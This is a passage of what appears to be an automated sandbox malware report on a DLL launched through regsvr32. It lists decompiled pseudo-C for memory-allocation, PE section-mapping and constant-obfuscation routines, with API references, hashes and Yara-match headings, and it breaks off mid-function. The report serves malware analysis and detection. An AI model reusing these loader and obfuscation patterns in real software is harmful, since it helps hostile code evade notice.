                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID: 3HS
                                                                                                                                                                            • API String ID: 963392458-330188696
                                                                                                                                                                            • Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                                                                                            • Instruction ID: 60511a8caca08a6b40e054e01c091b7e02b3777856aa913c0f07b067990f5465
                                                                                                                                                                            • Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C21F372800248BBCF159F96DC0ACDFBFB9EF85740F108198F915A2220C3B58A24DFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 230 100021d0-100021e0 231 100021e2-100021e7 230->231 232 100021ec-100021f8 230->232 233 100022ec-100022ef 231->233 234 10002254-100022b6 232->234 235 100021fa-10002205 232->235 236 100022c4-100022e1 VirtualProtect 234->236 237 100022b8-100022c1 234->237 238 10002207-1000220e 235->238 239 1000224a-1000224f 235->239 240 100022e3-100022e5 236->240 241 100022e7 236->241 237->236 242 10002210-1000221e 238->242 243 10002232-10002244 VirtualFree 238->243 239->233 240->233 241->233 242->243 244 10002220-10002230 242->244 243->239 244->239 244->243
                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
                                                                                                                                                                            				long _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				int _t67;
                                                                                                                                                                            
                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                            				if(_a8[2] != 0) {
                                                                                                                                                                            					if((_a8[3] & 0x02000000) == 0) {
                                                                                                                                                                            						asm("sbb ecx, ecx");
                                                                                                                                                                            						_v16 =  ~( ~(_a8[3] & 0x20000000));
                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                            						_v24 =  ~( ~(_a8[3] & 0x40000000));
                                                                                                                                                                            						asm("sbb edx, edx");
                                                                                                                                                                            						_v12 =  ~( ~(_a8[3] & 0x80000000));
                                                                                                                                                                            						_t39 = _v24 * 8; // 0x10056f20
                                                                                                                                                                            						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
                                                                                                                                                                            						if((_a8[3] & 0x04000000) != 0) {
                                                                                                                                                                            							_v20 = _v20 | 0x00000200;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
                                                                                                                                                                            						if(_t67 != 0) {
                                                                                                                                                                            							return 1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
                                                                                                                                                                            						VirtualFree( *_a8, _a8[2], 0x4000); // executed
                                                                                                                                                                            					}
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}










                                                                                                                                                                            0x100021d6
                                                                                                                                                                            0x100021e0
                                                                                                                                                                            0x100021f8
                                                                                                                                                                            0x10002262
                                                                                                                                                                            0x10002266
                                                                                                                                                                            0x10002276
                                                                                                                                                                            0x1000227a
                                                                                                                                                                            0x1000228b
                                                                                                                                                                            0x1000228f
                                                                                                                                                                            0x1000229b
                                                                                                                                                                            0x100022a8
                                                                                                                                                                            0x100022b6
                                                                                                                                                                            0x100022c1
                                                                                                                                                                            0x100022c1
                                                                                                                                                                            0x100022d9
                                                                                                                                                                            0x100022e1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100022e3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100022e3
                                                                                                                                                                            0x100022e1
                                                                                                                                                                            0x10002205
                                                                                                                                                                            0x10002244
                                                                                                                                                                            0x10002244
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000224a
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                            • Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
                                                                                                                                                                            • Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
                                                                                                                                                                            • Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 245 1001a305-1001a323 HeapCreate 246 1001a325-1001a327 245->246 247 1001a328-1001a335 call 1001a2aa 245->247 250 1001a337-1001a344 call 1001a57a 247->250 251 1001a35b-1001a35e 247->251 250->251 254 1001a346-1001a359 HeapDestroy 250->254 254->246
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1001A305(intOrPtr _a4) {
                                                                                                                                                                            				void* _t6;
                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                            				void* _t10;
                                                                                                                                                                            
                                                                                                                                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                            				 *0x1005ad4c = _t6;
                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                            					_t7 = E1001A2AA(__eflags);
                                                                                                                                                                            					__eflags = _t7 - 3;
                                                                                                                                                                            					 *0x1005c984 = _t7;
                                                                                                                                                                            					if(_t7 != 3) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                            						return 1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t10 = E1001A57A(0x3f8);
                                                                                                                                                                            						__eflags = _t10;
                                                                                                                                                                            						if(_t10 != 0) {
                                                                                                                                                                            							goto L5;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							HeapDestroy( *0x1005ad4c);
                                                                                                                                                                            							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            			}






                                                                                                                                                                            0x1001a316
                                                                                                                                                                            0x1001a31e
                                                                                                                                                                            0x1001a323
                                                                                                                                                                            0x1001a328
                                                                                                                                                                            0x1001a32d
                                                                                                                                                                            0x1001a330
                                                                                                                                                                            0x1001a335
                                                                                                                                                                            0x1001a35b
                                                                                                                                                                            0x1001a35d
                                                                                                                                                                            0x1001a35e
                                                                                                                                                                            0x1001a337
                                                                                                                                                                            0x1001a33c
                                                                                                                                                                            0x1001a341
                                                                                                                                                                            0x1001a344
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001a346
                                                                                                                                                                            0x1001a34c
                                                                                                                                                                            0x1001a352
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001a352
                                                                                                                                                                            0x1001a344
                                                                                                                                                                            0x1001a325
                                                                                                                                                                            0x1001a325
                                                                                                                                                                            0x1001a327
                                                                                                                                                                            0x1001a327

                                                                                                                                                                            APIs
                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
                                                                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3296620671-0
                                                                                                                                                                            • Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
                                                                                                                                                                            • Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
                                                                                                                                                                            • Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
                                                                                                                                                                            • Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 255 10002010-1000203e 256 10002052-1000205e 255->256 257 10002064-1000206b 256->257 258 10002156 256->258 259 100020d3-100020ee call 10001fe0 257->259 260 1000206d-1000207a 257->260 261 1000215b-1000215e 258->261 270 100020f0-100020f2 259->270 271 100020f4-10002119 VirtualAlloc 259->271 262 1000207c-1000209e VirtualAlloc 260->262 263 100020ce 260->263 265 100020a0-100020a2 262->265 266 100020a7-100020cb call 10001e10 262->266 263->256 265->261 266->263 270->261 272 1000211b-1000211d 271->272 273 1000211f-1000214e call 10001e60 271->273 272->261 273->258
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				long _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t76;
                                                                                                                                                                            				void* _t127;
                                                                                                                                                                            
                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                            				_t3 = _a16 + 4; // 0x104e9
                                                                                                                                                                            				_v20 =  *_t3;
                                                                                                                                                                            				_t7 =  *_a16 + 0x14; // 0x4a8bb445
                                                                                                                                                                            				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
                                                                                                                                                                            				_v24 =  *_a16 + _t9;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t17 =  *_a16 + 6; // 0xe9000001
                                                                                                                                                                            					if(_v8 >= ( *_t17 & 0x0000ffff)) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *(_v24 + 0x10) != 0) {
                                                                                                                                                                            						_t41 = _v24 + 0x14; // 0x4a8bb445
                                                                                                                                                                            						_t43 = _v24 + 0x10; // 0x8b118bbc
                                                                                                                                                                            						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
                                                                                                                                                                            							_t47 = _v24 + 0x10; // 0x8b118bbc
                                                                                                                                                                            							_t50 = _v24 + 0xc; // 0x4d8b0000
                                                                                                                                                                            							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
                                                                                                                                                                            							_v12 = _t76;
                                                                                                                                                                            							if(_v12 != 0) {
                                                                                                                                                                            								_t55 = _v24 + 0xc; // 0x4d8b0000
                                                                                                                                                                            								_v12 = _v20 +  *_t55;
                                                                                                                                                                            								_t58 = _v24 + 0x10; // 0x8b118bbc
                                                                                                                                                                            								_t61 = _v24 + 0x14; // 0x4a8bb445
                                                                                                                                                                            								E10001E60(_v12, _a4 +  *_t61,  *_t58);
                                                                                                                                                                            								_t127 = _t127 + 0xc;
                                                                                                                                                                            								 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                                            								L1:
                                                                                                                                                                            								_v8 = _v8 + 1;
                                                                                                                                                                            								_v24 = _v24 + 0x28;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					_v16 =  *((intOrPtr*)(_a12 + 0x38));
                                                                                                                                                                            					if(_v16 <= 0) {
                                                                                                                                                                            						L8:
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t28 = _v24 + 0xc; // 0x4d8b0000
                                                                                                                                                                            					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                            						_t33 = _v24 + 0xc; // 0x4d8b0000
                                                                                                                                                                            						_v12 = _v20 +  *_t33;
                                                                                                                                                                            						 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                                            						E10001E10(_v12, 0, _v16);
                                                                                                                                                                            						_t127 = _t127 + 0xc;
                                                                                                                                                                            						goto L8;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}











                                                                                                                                                                            0x10002016
                                                                                                                                                                            0x1000201c
                                                                                                                                                                            0x1000201f
                                                                                                                                                                            0x1000202c
                                                                                                                                                                            0x10002030
                                                                                                                                                                            0x10002034
                                                                                                                                                                            0x10002037
                                                                                                                                                                            0x10002052
                                                                                                                                                                            0x10002057
                                                                                                                                                                            0x1000205e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000206b
                                                                                                                                                                            0x100020d6
                                                                                                                                                                            0x100020dc
                                                                                                                                                                            0x100020ee
                                                                                                                                                                            0x100020fe
                                                                                                                                                                            0x10002108
                                                                                                                                                                            0x1000210c
                                                                                                                                                                            0x10002112
                                                                                                                                                                            0x10002119
                                                                                                                                                                            0x10002125
                                                                                                                                                                            0x10002128
                                                                                                                                                                            0x1000212e
                                                                                                                                                                            0x10002138
                                                                                                                                                                            0x10002140
                                                                                                                                                                            0x10002145
                                                                                                                                                                            0x1000214e
                                                                                                                                                                            0x10002040
                                                                                                                                                                            0x10002046
                                                                                                                                                                            0x1000204f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000204f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000211b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020f0
                                                                                                                                                                            0x10002073
                                                                                                                                                                            0x1000207a
                                                                                                                                                                            0x100020ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020ce
                                                                                                                                                                            0x1000208d
                                                                                                                                                                            0x10002097
                                                                                                                                                                            0x1000209e
                                                                                                                                                                            0x100020ad
                                                                                                                                                                            0x100020b0
                                                                                                                                                                            0x100020b9
                                                                                                                                                                            0x100020c6
                                                                                                                                                                            0x100020cb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020cb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020a0
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
                                                                                                                                                                            • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
                                                                                                                                                                            • Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
                                                                                                                                                                            • Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 277 10008860-1000887a call 1001703b 280 10008883-10008897 277->280 281 1000887c-10008881 277->281 283 100088ab-100088b2 280->283 282 100088db-100088de 281->282 284 100088b4-100088bc 283->284 285 100088be-100088c2 call 10016380 283->285 284->283 288 100088c7-100088d0 285->288 289 100088d2-100088d4 288->289 290 100088d6 288->290 289->282 290->282
                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E10008860(void* __eflags) {
                                                                                                                                                                            				char* _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				char* _v20;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            
                                                                                                                                                                            				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                            					_v12 = 0x5f5e100;
                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                            					_v20 = _v8;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						__eflags = _v16 - 0x5f5e100;
                                                                                                                                                                            						if(__eflags >= 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *_v20 = _v16;
                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                            						_t32 = _v20 + 1;
                                                                                                                                                                            						__eflags = _t32;
                                                                                                                                                                            						_v20 = _t32;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_v8); // executed
                                                                                                                                                                            					E10016380(_t25, _t33, _t34, __eflags); // executed
                                                                                                                                                                            					__eflags = _v16 - _v12;
                                                                                                                                                                            					if(_v16 != _v12) {
                                                                                                                                                                            						return 3;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 3;
                                                                                                                                                                            			}













                                                                                                                                                                            0x10008873
                                                                                                                                                                            0x1000887a
                                                                                                                                                                            0x10008883
                                                                                                                                                                            0x1000888a
                                                                                                                                                                            0x10008894
                                                                                                                                                                            0x100088ab
                                                                                                                                                                            0x100088ab
                                                                                                                                                                            0x100088b2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100088ba
                                                                                                                                                                            0x1000889f
                                                                                                                                                                            0x100088a5
                                                                                                                                                                            0x100088a5
                                                                                                                                                                            0x100088a8
                                                                                                                                                                            0x100088a8
                                                                                                                                                                            0x100088c1
                                                                                                                                                                            0x100088c2
                                                                                                                                                                            0x100088cd
                                                                                                                                                                            0x100088d0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100088d6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100088d2
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • _malloc.LIBCMT ref: 1000886B
                                                                                                                                                                              • Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
                                                                                                                                                                              • Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
                                                                                                                                                                              • Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 501242067-0
                                                                                                                                                                            • Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
                                                                                                                                                                            • Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
                                                                                                                                                                            • Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
                                                                                                                                                                            • Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 291 e7d11a-e7d1bb call e6eb52 ExitProcess
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00E7D11A() {
                                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v36 = 0x78f5c7;
                                                                                                                                                                            				_v32 = 0xa12bb9;
                                                                                                                                                                            				_v28 = 0x4eca09;
                                                                                                                                                                            				_v8 = 0x8b256f;
                                                                                                                                                                            				_v8 = _v8 << 0xb;
                                                                                                                                                                            				_v8 = _v8 ^ 0x4a7d0011;
                                                                                                                                                                            				_v8 = _v8 >> 9;
                                                                                                                                                                            				_v8 = _v8 ^ 0x00073d60;
                                                                                                                                                                            				_v20 = 0x1e549a;
                                                                                                                                                                            				_v20 = _v20 + 0xffffad33;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00134b4f;
                                                                                                                                                                            				_v16 = 0x8dd9dd;
                                                                                                                                                                            				_v16 = _v16 << 3;
                                                                                                                                                                            				_v16 = _v16 ^ 0x0460bc3c;
                                                                                                                                                                            				_v12 = 0x358059;
                                                                                                                                                                            				_v12 = _v12 + 0xb97b;
                                                                                                                                                                            				_v12 = _v12 ^ 0x003502df;
                                                                                                                                                                            				E00E6EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                                                                                                                                                                            				ExitProcess(0);
                                                                                                                                                                            			}












                                                                                                                                                                            0x00e7d120
                                                                                                                                                                            0x00e7d124
                                                                                                                                                                            0x00e7d12b
                                                                                                                                                                            0x00e7d132
                                                                                                                                                                            0x00e7d139
                                                                                                                                                                            0x00e7d140
                                                                                                                                                                            0x00e7d144
                                                                                                                                                                            0x00e7d14b
                                                                                                                                                                            0x00e7d14f
                                                                                                                                                                            0x00e7d156
                                                                                                                                                                            0x00e7d15d
                                                                                                                                                                            0x00e7d164
                                                                                                                                                                            0x00e7d16b
                                                                                                                                                                            0x00e7d172
                                                                                                                                                                            0x00e7d176
                                                                                                                                                                            0x00e7d17d
                                                                                                                                                                            0x00e7d184
                                                                                                                                                                            0x00e7d18b
                                                                                                                                                                            0x00e7d1ac
                                                                                                                                                                            0x00e7d1b6

                                                                                                                                                                            APIs
                                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00E7D1B6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253623838.0000000000E61000.00000020.00000001.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253619899.0000000000E60000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253642695.0000000000E86000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_e60000_regsvr32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                            • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                                                                                            • Instruction ID: 827669d364abfe277b907cabf3f2122e61e5418f2f6d0e9e432afb2256bc7d6f
                                                                                                                                                                            • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                                                                                            • Instruction Fuzzy Hash: DD1100B1C4030CEBDB54DFE5D94A69EBBB0EB00748F108588D521B6241D3B89A489F90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 310 e8061d-e806eb call e7fe29 call e6eb52 lstrcmpiW
                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E00E8061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				int _t53;
